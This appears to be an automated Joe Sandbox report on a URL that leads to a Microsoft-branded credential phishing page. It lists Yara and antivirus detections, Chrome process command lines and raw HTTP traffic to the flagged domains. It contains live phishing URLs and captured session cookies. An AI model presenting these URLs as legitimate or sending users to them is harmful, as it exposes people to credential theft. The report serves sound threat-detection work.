Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/

Overview

General Information

Sample URL:https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/
Analysis ID:1403432
Infos:

Detection

HtmlDropper, HTMLPhisher
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected Html Dropper
Yara detected HtmlPhish10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Invalid 'sign-in options' or 'sign-up' link found
Sample execution stops while process was sleeping (likely an evasion)

Classification

  • System is w10x64
  • chrome.exe (PID: 1696 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4632 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1748,i,5136223978624495583,15776153539356877237,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6432 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • conhost.exe (PID: 6456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
3.6.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
    3.6.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      4.7.pages.csvJoeSecurity_HtmlDropper_3Yara detected Html DropperJoe Security
        4.7.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://ampvance.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/js/048a11303f2c0b13c71de5123e30fffb65e71cdee6db3Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/boot/048a11303f2c0b13c71de5123e30fffb65e71cdee6db2Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/ASSETS/img/m_.svgAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/favicon.icoAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/APP-048a11303f2c0b13c71de5123e30fffb65e71ce053bdc/048a11303f2c0b13c71de5123e30fffb65e71ce053bdeAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/1Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/ASSETS/img/sig-op.svgAvira URL Cloud: Label: phishing
          Source: https://ampvance.com/o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6b69aed817b1Avira URL Cloud: Label: phishing
          Source: https://ampvance.com/jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6dafAvira URL Cloud: Label: phishing

          Phishing

          barindex
          Source: Yara matchFile source: 3.6.pages.csv, type: HTML
          Source: Yara matchFile source: 4.7.pages.csv, type: HTML
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fMatcher: Found strong image similarity, brand: MICROSOFT
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fMatcher: Template: microsoft matched
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f#Matcher: Template: microsoft matched
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fHTTP Parser: Number of links: 0
          Source: https://ampvance.com/HTTP Parser: Base64 decoded: https://ampvance.com/
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fHTTP Parser: Title: Sign in to the Best Productivity Provider! does not match URL
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fHTTP Parser: Invalid link: get a new Microsoft account
          Source: https://ampvance.com/HTTP Parser: No favicon
          Source: https://ampvance.com/HTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normalHTTP Parser: No favicon
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fHTTP Parser: No favicon
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fHTTP Parser: No <meta name="author".. found
          Source: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fHTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.51.58.94:443 -> 192.168.2.4:49742 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 23.51.58.94
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /satin/x4/cg1-b1m/ HTTP/1.1Host: rfpcertstream.castlehillinfotech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: rfpcertstream.castlehillinfotech.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfpcertstream.castlehillinfotech.com/satin/x4/cg1-b1m/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=lqpseg7htprg0stg76l4v79n72
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://rfpcertstream.castlehillinfotech.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=85fa6b69aed817b1 HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/?__cf_chl_rt_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/a0d8959cb7d0/api.js?onload=lDtWXt4&render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ampvance.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=85fa6b76cf6e4369 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/85fa6b76cf6e4369/1709644999735/5XCbngvQK7ffH2m HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/85fa6b76cf6e4369/1709644999735/5XCbngvQK7ffH2m HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/85fa6b76cf6e4369/1709644999741/0fb3a646aa0a887b61a44db8eafd773faaff7031b3776205cabb903351463218/dAp7jUY1dzXr_Hs HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qb3jj/0x4AAAAAAADnPIDROrmt1Wwj/light/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1318590694:1709641463:zSaOyPPd1Tt7Y_AdkvJadIWaaVllOPiN8i5OYGFk-_M/85fa6b76cf6e4369/2573fed2a68f8e4 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ampvance.com/?__cf_chl_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1934419278:1709641400:nf2d9uXBpqI_eJS2Oi0Ck7HqLPnuP008yVnwRQOaiCc/85fa6b69aed817b1/8a01f925e609515 HTTP/1.1Host: ampvance.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f HTTP/1.1Host: ampvance.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Referer: https://ampvance.com/?__cf_chl_tk=3yAfPjzz9mWgpHVStS6F4iNx.u6TsGuIonpQn1.luEg-1709644996-0.0.1.1-1557Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
          Source: global trafficHTTP traffic detected: GET /jq/048a11303f2c0b13c71de5123e30fffb65e71cdee6daf HTTP/1.1Host: ampvance.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93fAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
